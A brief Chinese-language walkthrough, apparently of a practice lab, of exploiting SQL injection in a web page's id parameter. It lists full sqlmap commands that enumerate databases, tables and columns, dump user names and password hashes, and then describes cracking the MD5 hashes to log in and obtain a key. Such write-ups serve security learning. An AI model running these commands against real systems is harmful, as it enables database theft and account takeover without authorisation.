来咯来咯~
一起看一下系统界面吧,哎嘿,有登录框,操作一波发现,没注入😓
点击平台维护通知,发现url中有id=1,很明显,指定有注入啊😁
上工具,先爆破数据库
sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 --dbs –batch
发现stormgroup数据库名
爆破表
sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup --tables --batch
哇呜~ 有member
接着干就完了,爆破列名
sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup -T member --columns –batch
这不就出来了嘛
拖库,查看账号密码
sqlmap -u http://124.70.71.251:40299/new_list.php?id=1 -D stormgroup -T member -C 'name,password' --dump –batch
密码使用MD5加密
使用在线解密工具
登录后显示用户被禁用或者不存在
解密另一个试试
登录成功,成功得到key
加油加油!!!